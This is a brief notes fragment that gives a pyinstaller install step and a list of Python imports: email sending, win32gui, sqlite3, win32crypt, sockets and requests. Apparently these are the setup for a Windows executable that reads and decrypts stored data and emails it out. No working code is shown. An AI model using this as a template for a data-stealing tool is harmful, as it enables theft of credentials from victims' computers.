# Most Important
```pip install pyinstaller``` // you need this to convert your .py file to .exe

import os
import time
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import win32gui
import socket
import requests
import sqlite3
import win32crypt (pip install pywin32)
import sys
import platform
